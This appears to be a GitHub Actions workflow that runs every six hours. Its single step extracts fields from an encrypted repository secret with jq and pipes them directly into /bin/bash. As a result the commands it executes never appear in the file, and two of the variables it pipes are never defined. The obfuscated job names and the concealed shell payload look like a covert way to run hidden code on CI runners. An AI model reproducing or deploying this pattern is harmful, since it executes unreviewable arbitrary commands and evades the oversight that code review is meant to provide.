name: breadcurling

on:
  workflow_dispatch:
  schedule:
    - cron: '2 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: breadcurling
        env:
          xn2269: ${{ secrets.xn2269 }}
        run: |
          echo $xn2269 | jq -r .d0 | /bin/bash
          echo $pkhg8 | jq -r .iita0 | /bin/bash
          echo $l549 | jq -r .ywwlb24877 | /bin/bash

